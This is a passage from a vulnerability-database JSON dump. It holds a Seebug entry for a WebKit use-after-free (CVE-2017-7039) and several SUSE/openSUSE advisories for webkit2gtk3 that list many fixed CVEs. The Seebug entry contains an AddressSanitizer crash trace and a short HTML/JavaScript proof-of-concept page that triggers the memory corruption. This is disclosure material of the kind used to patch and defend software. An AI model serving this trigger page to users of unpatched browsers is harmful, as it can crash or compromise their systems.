(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd111a4)\r\n #10 0x111e8aac9 in WebCore::HTMLConstructionSite::createHTMLElementOrFindCustomElementInterface(WebCore::AtomicHTMLToken&, WebCore::JSCustomElementInterface**) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd5ac9)\r\n #11 0x111e89e17 in WebCore::HTMLConstructionSite::createHTMLElement(WebCore::AtomicHTMLToken&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd4e17)\r\n #12 0x111e8a504 in WebCore::HTMLConstructionSite::insertHTMLElement(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd5504)\r\n #13 0x111feadf4 in WebCore::HTMLTreeBuilder::processStartTagForInBody(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe35df4)\r\n #14 0x111fe7a43 in WebCore::HTMLTreeBuilder::processStartTag(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe32a43)\r\n #15 0x111fe583e in WebCore::HTMLTreeBuilder::constructTree(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe3083e)\r\n #16 0x111eb7bba in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd02bba)\r\n #17 0x111eb7779 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd02779)\r\n #18 0x111eb69a6 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd019a6)\r\n #19 0x111eb842e in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd0342e)\r\n #20 0x1118a5351 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x6f0351)\r\n #21 0x1119e103d in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c03d)\r\n #22 0x1119a0386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)\r\n #23 0x11142f997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)\r\n #24 0x1114292aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)\r\n #25 0x113db0c41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)\r\n #26 0x10cfff2eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)\r\n #27 0x10d002689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)\r\n #28 0x10d001ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)\r\n #29 0x10c8a2683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)\r\n\r\nSUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1343a) in WebCore::Node::nextSibling() const\r\n==29516==ABORTING\r\n=================================================================\r\n```", "published": "2017-07-27T00:00:00", "type": "seebug", "title": "WebKit: use-after-free in WebCore::Node::nextSibling(CVE-2017-7039)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7039"], "modified": "2017-07-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96312", "id": "SSV:96312", "sourceData": "\n <script>\r\nfunction freememory() {\r\n var a;\r\n for(var i=0;i<100;i++) {\r\n a = new Uint8Array(1024*1024);\r\n }\r\n}\r\nfunction go() {\r\n meter.textContent = \"foo\";\r\n freememory();\r\n}\r\nfunction eventhandler() {\r\n template.appendChild(table);\r\n}\r\n</script>\r\n<body onload=go()>\r\n<meter id=\"meter\">\r\n<shadow>\r\n<template id=\"template\">\r\n</template>\r\n<style onload=\"eventhandler()\"></style>\r\n<table id=\"table\">\r\n<iframe></iframe>\r\n<svg>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96312", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "suse": [{"lastseen": "2017-11-10T20:33:12", "bulletinFamily": "unix", "cvelist": ["CVE-2017-2369", "CVE-2017-7034", "CVE-2017-7064", "CVE-2017-2355", "CVE-2017-7056", "CVE-2016-7599", "CVE-2017-7055", "CVE-2016-7654", "CVE-2017-2539", "CVE-2017-2363", "CVE-2016-7623", "CVE-2016-7645", "CVE-2017-2366", "CVE-2016-7589", "CVE-2016-7586", "CVE-2017-2538", "CVE-2017-2365", "CVE-2017-7037", "CVE-2017-7018", "CVE-2016-7641", "CVE-2016-7635", "CVE-2017-7061", "CVE-2017-2371", "CVE-2016-7652", "CVE-2017-7048", "CVE-2016-7632", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-2496", "CVE-2017-2364", "CVE-2017-2350", "CVE-2017-2373", "CVE-2017-2356", "CVE-2016-7639", "CVE-2016-7592", "CVE-2016-7656", "CVE-2017-2510", "CVE-2017-2362", "CVE-2017-7030", "CVE-2017-2354"], "description": "This update for webkit2gtk3 to version 2.18.0 fixes the 
following issues:\n\n These security issues were fixed:\n\n - CVE-2017-7039: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7018: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7030: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7037: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7034: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7055: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7056: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7064: An issue was fixed that allowed remote attackers to\n bypass intended memory-read restrictions via a crafted app (bsc#1050469).\n - CVE-2017-7061: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7048: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory 
corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7046: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-2538: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1045460)\n - CVE-2017-2496: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site.\n - CVE-2017-2539: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site.\n - CVE-2017-2510: An issue was fixed that allowed remote attackers to\n conduct Universal XSS (UXSS) attacks via a crafted web site that\n improperly interacts with pageshow events.\n - CVE-2017-2365: An issue was fixed that allowed remote attackers to\n bypass the Same Origin Policy and obtain sensitive information via a\n crafted web site (bsc#1024749)\n - CVE-2017-2366: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1024749)\n - CVE-2017-2373: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1024749)\n - CVE-2017-2363: An issue was fixed that allowed remote attackers to\n bypass the Same Origin Policy and obtain sensitive information via a\n crafted web site (bsc#1024749)\n - CVE-2017-2362: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a 
crafted web site (bsc#1024749)\n - CVE-2017-2350: An issue was fixed that allowed remote attackers to\n bypass the Same Origin Policy and obtain sensitive information via a\n crafted web site (bsc#1024749)\n - CVE-2017-2350: An issue was fixed that allowed remote attackers to\n bypass the Same Origin Policy and obtain sensitive information via a\n crafted web site (bsc#1024749)\n - CVE-2017-2354: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1024749).\n - CVE-2017-2355: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (uninitialized\n memory access and application crash) via a crafted web site (bsc#1024749)\n - CVE-2017-2356: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1024749)\n - CVE-2017-2371: An issue was fixed that allowed remote attackers to\n launch popups via a crafted web site (bsc#1024749)\n - CVE-2017-2364: An issue was fixed that allowed remote attackers to\n bypass the Same Origin Policy and obtain sensitive information via a\n crafted web site (bsc#1024749)\n - CVE-2017-2369: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1024749)\n - CVE-2016-7656: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7635: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7654: An issue was fixed that allowed remote attackers to\n 
execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7639: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7645: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7652: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7641: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7632: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7599: An issue was fixed that allowed remote attackers to\n bypass the Same Origin Policy and obtain sensitive information via a\n crafted web site that used HTTP redirects (bsc#1020950)\n - CVE-2016-7592: An issue was fixed that allowed remote attackers to\n obtain sensitive information via crafted JavaScript prompts on a web\n site (bsc#1020950)\n - CVE-2016-7589: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7623: An issue was fixed that allowed remote attackers to\n obtain sensitive information via a blob URL on a web site (bsc#1020950)\n - CVE-2016-7586: An issue was fixed that allowed remote attackers to\n obtain sensitive information via a crafted web 
site (bsc#1020950)\n\n For other non-security fixes please check the changelog.\n\n This update was imported from the SUSE:SLE-12-SP2:Update update project.\n\n", "edition": 1, "modified": "2017-11-10T18:22:30", "published": "2017-11-10T18:22:30", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-11/msg00019.html", "id": "OPENSUSE-SU-2017:2991-1", "title": "Security update for webkit2gtk3 (important)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-06T18:33:22", "bulletinFamily": "unix", "cvelist": ["CVE-2017-2369", "CVE-2017-7034", "CVE-2017-7064", "CVE-2017-2355", "CVE-2017-7056", "CVE-2016-7599", "CVE-2017-7055", "CVE-2016-7654", "CVE-2017-2539", "CVE-2017-2363", "CVE-2016-7623", "CVE-2016-7645", "CVE-2017-2366", "CVE-2016-7589", "CVE-2016-7586", "CVE-2017-2538", "CVE-2017-2365", "CVE-2017-7037", "CVE-2017-7018", "CVE-2016-7641", "CVE-2016-7635", "CVE-2017-7061", "CVE-2017-2371", "CVE-2016-7652", "CVE-2017-7048", "CVE-2016-7632", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-2496", "CVE-2017-2364", "CVE-2017-2350", "CVE-2017-2373", "CVE-2017-2356", "CVE-2016-7639", "CVE-2016-7592", "CVE-2016-7656", "CVE-2017-2510", "CVE-2017-2362", "CVE-2017-7030", "CVE-2017-2354"], "description": "This update for webkit2gtk3 to version 2.18.0 fixes the following issues:\n\n These security issues were fixed:\n\n - CVE-2017-7039: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7018: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7030: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application 
crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7037: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7034: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7055: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7056: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7064: An issue was fixed that allowed remote attackers to\n bypass intended memory-read restrictions via a crafted app (bsc#1050469).\n - CVE-2017-7061: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7048: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-7046: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n - CVE-2017-2538: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1045460)\n - CVE-2017-2496: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and 
application crash) via a crafted web site.\n - CVE-2017-2539: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site.\n - CVE-2017-2510: An issue was fixed that allowed remote attackers to\n conduct Universal XSS (UXSS) attacks via a crafted web site that\n improperly interacts with pageshow events.\n - CVE-2017-2365: An issue was fixed that allowed remote attackers to\n bypass the Same Origin Policy and obtain sensitive information via a\n crafted web site (bsc#1024749)\n - CVE-2017-2366: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1024749)\n - CVE-2017-2373: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1024749)\n - CVE-2017-2363: An issue was fixed that allowed remote attackers to\n bypass the Same Origin Policy and obtain sensitive information via a\n crafted web site (bsc#1024749)\n - CVE-2017-2362: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1024749)\n - CVE-2017-2350: An issue was fixed that allowed remote attackers to\n bypass the Same Origin Policy and obtain sensitive information via a\n crafted web site (bsc#1024749)\n - CVE-2017-2350: An issue was fixed that allowed remote attackers to\n bypass the Same Origin Policy and obtain sensitive information via a\n crafted web site (bsc#1024749)\n - CVE-2017-2354: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1024749).\n - CVE-2017-2355: An issue was fixed that allowed 
remote attackers to\n execute arbitrary code or cause a denial of service (uninitialized\n memory access and application crash) via a crafted web site (bsc#1024749)\n - CVE-2017-2356: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1024749)\n - CVE-2017-2371: An issue was fixed that allowed remote attackers to\n launch popups via a crafted web site (bsc#1024749)\n - CVE-2017-2364: An issue was fixed that allowed remote attackers to\n bypass the Same Origin Policy and obtain sensitive information via a\n crafted web site (bsc#1024749)\n - CVE-2017-2369: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1024749)\n - CVE-2016-7656: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7635: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7654: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7639: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7645: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7652: An issue was fixed that allowed remote attackers to\n execute arbitrary 
code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7641: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7632: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7599: An issue was fixed that allowed remote attackers to\n bypass the Same Origin Policy and obtain sensitive information via a\n crafted web site that used HTTP redirects (bsc#1020950)\n - CVE-2016-7592: An issue was fixed that allowed remote attackers to\n obtain sensitive information via crafted JavaScript prompts on a web\n site (bsc#1020950)\n - CVE-2016-7589: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1020950)\n - CVE-2016-7623: An issue was fixed that allowed remote attackers to\n obtain sensitive information via a blob URL on a web site (bsc#1020950)\n - CVE-2016-7586: An issue was fixed that allowed remote attackers to\n obtain sensitive information via a crafted web site (bsc#1020950)\n\n For other non-security fixes please check the changelog.\n\n", "edition": 1, "modified": "2017-11-06T15:08:25", "published": "2017-11-06T15:08:25", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-11/msg00005.html", "id": "SUSE-SU-2017:2933-1", "title": "Security update for webkit2gtk3 (important)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-02-01T02:54:02", "bulletinFamily": "unix", "cvelist": ["CVE-2017-2369", "CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7064", "CVE-2017-5753", "CVE-2017-5754", 
"CVE-2017-7102", "CVE-2017-7020", "CVE-2017-13856", "CVE-2017-7038", "CVE-2017-13866", "CVE-2017-2355", "CVE-2017-7120", "CVE-2017-7117", "CVE-2017-7056", "CVE-2016-7599", "CVE-2016-4743", "CVE-2017-7055", "CVE-2016-7654", "CVE-2017-2539", "CVE-2017-2363", "CVE-2017-7099", "CVE-2016-7623", "CVE-2016-7645", "CVE-2017-2366", "CVE-2016-7589", "CVE-2017-7096", "CVE-2016-7586", "CVE-2017-7042", "CVE-2017-7090", "CVE-2017-2365", "CVE-2017-7081", "CVE-2017-7049", "CVE-2017-13788", "CVE-2017-13870", "CVE-2017-7037", "CVE-2017-7093", "CVE-2017-5715", "CVE-2016-7610", "CVE-2017-7156", "CVE-2017-13803", "CVE-2017-7018", "CVE-2016-7641", "CVE-2017-7052", "CVE-2016-7635", "CVE-2017-7061", "CVE-2017-2371", "CVE-2016-7652", "CVE-2017-7089", "CVE-2017-7048", "CVE-2016-7632", "CVE-2017-7107", "CVE-2017-7039", "CVE-2017-7098", "CVE-2017-7046", "CVE-2017-2496", "CVE-2017-2364", "CVE-2017-2350", "CVE-2017-7142", "CVE-2017-2373", "CVE-2017-7087", "CVE-2017-7092", "CVE-2017-7012", "CVE-2017-7019", "CVE-2016-7598", "CVE-2017-7040", "CVE-2017-2356", "CVE-2016-7587", "CVE-2017-7095", "CVE-2016-7639", "CVE-2016-7592", "CVE-2017-7100", "CVE-2016-7656", "CVE-2017-7157", "CVE-2017-7011", "CVE-2017-7006", "CVE-2017-7059", "CVE-2016-4692", "CVE-2017-7091", "CVE-2017-2510", "CVE-2017-2362", "CVE-2017-7094", "CVE-2017-7104", "CVE-2017-13798", "CVE-2017-7109", "CVE-2017-7030", "CVE-2017-7111", "CVE-2017-7041", "CVE-2017-2354"], "description": "This update for webkit2gtk3 fixes the following issues:\n\n Update to version 2.18.5:\n\n + Disable SharedArrayBuffers from Web API.\n + Reduce the precision of "high" resolution time to 1ms.\n + bsc#1075419 - Security fixes: includes improvements to mitigate the\n effects of Spectre and Meltdown (CVE-2017-5753 and CVE-2017-5715).\n\n Update to version 2.18.4:\n\n + Make WebDriver implementation more spec compliant.\n + Fix a bug when trying to remove cookies before a web process is\n spawned.\n + WebKitWebDriver process no longer links to 
libjavascriptcoregtk.\n + Fix several memory leaks in GStreamer media backend.\n + bsc#1073654 - Security fixes: CVE-2017-13866, CVE-2017-13870,\n CVE-2017-7156, CVE-2017-13856.\n\n Update to version 2.18.3:\n\n + Improve calculation of font metrics to prevent scrollbars from being\n shown unnecessarily in some cases.\n + Fix handling of null capabilities in WebDriver implementation.\n + Security fixes: CVE-2017-13798, CVE-2017-13788, CVE-2017-13803.\n\n Update to version 2.18.2:\n\n + Fix rendering of arabic text.\n + Fix a crash in the web process when decoding GIF images.\n + Fix rendering of wind in Windy.com.\n + Fix several crashes and rendering issues.\n\n Update to version 2.18.1:\n\n + Improve performance of GIF animations.\n + Fix garbled display in GMail.\n + Fix rendering of several material design icons when using the web font.\n + Fix flickering when resizing the window in Wayland.\n + Prevent default kerberos authentication credentials from being used in\n ephemeral sessions.\n + Fix a crash when webkit_web_resource_get_data() is cancelled.\n + Correctly handle touchmove and touchend events in WebKitWebView.\n + Fix the build with enchant 2.1.1.\n + Fix the build in HPPA and Alpha.\n + Fix several crashes and rendering issues.\n + Security fixes: CVE-2017-7081, CVE-2017-7087, CVE-2017-7089,\n CVE-2017-7090, CVE-2017-7091, CVE-2017-7092, CVE-2017-7093,\n CVE-2017-7094, CVE-2017-7095, CVE-2017-7096, CVE-2017-7098,\n CVE-2017-7099, CVE-2017-7100, CVE-2017-7102, CVE-2017-7104,\n CVE-2017-7107, CVE-2017-7109, CVE-2017-7111, CVE-2017-7117,\n CVE-2017-7120, CVE-2017-7142.\n\n - Enable gold linker on s390/s390x on SLE15/Tumbleweed.\n\n This update was imported from the SUSE:SLE-12-SP2:Update update project.\n\n", "edition": 1, "modified": "2018-02-01T00:14:30", "published": "2018-02-01T00:14:30", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00106.html", "id": "OPENSUSE-SU-2018:0326-1", "type": "suse", "title": "Security update for 
webkit2gtk3 (important)", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-26T00:53:32", "bulletinFamily": "unix", "cvelist": ["CVE-2017-2369", "CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7064", "CVE-2017-5753", "CVE-2017-5754", "CVE-2017-7102", "CVE-2017-7020", "CVE-2017-13856", "CVE-2017-7038", "CVE-2017-13866", "CVE-2017-2355", "CVE-2017-7120", "CVE-2017-7117", "CVE-2017-7056", "CVE-2016-7599", "CVE-2016-4743", "CVE-2017-7055", "CVE-2016-7654", "CVE-2017-2539", "CVE-2017-2363", "CVE-2017-7099", "CVE-2016-7623", "CVE-2016-7645", "CVE-2017-2366", "CVE-2016-7589", "CVE-2017-7096", "CVE-2016-7586", "CVE-2017-7042", "CVE-2017-7090", "CVE-2017-2365", "CVE-2017-7081", "CVE-2017-7049", "CVE-2017-13788", "CVE-2017-13870", "CVE-2017-7037", "CVE-2017-7093", "CVE-2017-5715", "CVE-2016-7610", "CVE-2017-7156", "CVE-2017-13803", "CVE-2017-7018", "CVE-2016-7641", "CVE-2017-7052", "CVE-2016-7635", "CVE-2017-7061", "CVE-2017-2371", "CVE-2016-7652", "CVE-2017-7089", "CVE-2017-7048", "CVE-2016-7632", "CVE-2017-7107", "CVE-2017-7039", "CVE-2017-7098", "CVE-2017-7046", "CVE-2017-2496", "CVE-2017-2364", "CVE-2017-2350", "CVE-2017-7142", "CVE-2017-2373", "CVE-2017-7087", "CVE-2017-7092", "CVE-2017-7012", "CVE-2017-7019", "CVE-2016-7598", "CVE-2017-7040", "CVE-2017-2356", "CVE-2016-7587", "CVE-2017-7095", "CVE-2016-7639", "CVE-2016-7592", "CVE-2017-7100", "CVE-2016-7656", "CVE-2017-7157", "CVE-2017-7011", "CVE-2017-7006", "CVE-2017-7059", "CVE-2016-4692", "CVE-2017-7091", "CVE-2017-2510", "CVE-2017-2362", "CVE-2017-7094", "CVE-2017-7104", "CVE-2017-13798", "CVE-2017-7109", "CVE-2017-7030", "CVE-2017-7111", "CVE-2017-7041", "CVE-2017-2354"], "description": "This update for webkit2gtk3 fixes the following issues:\n\n Update to version 2.18.5:\n\n + Disable SharedArrayBuffers from Web API.\n + Reduce the precision of "high" resolution time to 1ms.\n + bsc#1075419 - Security fixes: includes improvements to mitigate 
the\n effects of Spectre and Meltdown (CVE-2017-5753 and CVE-2017-5715).\n\n Update to version 2.18.4:\n\n + Make WebDriver implementation more spec compliant.\n + Fix a bug when trying to remove cookies before a web process is\n spawned.\n + WebKitWebDriver process no longer links to libjavascriptcoregtk.\n + Fix several memory leaks in GStreamer media backend.\n + bsc#1073654 - Security fixes: CVE-2017-13866, CVE-2017-13870,\n CVE-2017-7156, CVE-2017-13856.\n\n Update to version 2.18.3:\n\n + Improve calculation of font metrics to prevent scrollbars from being\n shown unnecessarily in some cases.\n + Fix handling of null capabilities in WebDriver implementation.\n + Security fixes: CVE-2017-13798, CVE-2017-13788, CVE-2017-13803.\n\n Update to version 2.18.2:\n\n + Fix rendering of arabic text.\n + Fix a crash in the web process when decoding GIF images.\n + Fix rendering of wind in Windy.com.\n + Fix several crashes and rendering issues.\n\n Update to version 2.18.1:\n\n + Improve performance of GIF animations.\n + Fix garbled display in GMail.\n + Fix rendering of several material design icons when using the web font.\n + Fix flickering when resizing the window in Wayland.\n + Prevent default kerberos authentication credentials from being used in\n ephemeral sessions.\n + Fix a crash when webkit_web_resource_get_data() is cancelled.\n + Correctly handle touchmove and touchend events in WebKitWebView.\n + Fix the build with enchant 2.1.1.\n + Fix the build in HPPA and Alpha.\n + Fix several crashes and rendering issues.\n + Security fixes: CVE-2017-7081, CVE-2017-7087, CVE-2017-7089,\n CVE-2017-7090, CVE-2017-7091, CVE-2017-7092, CVE-2017-7093,\n 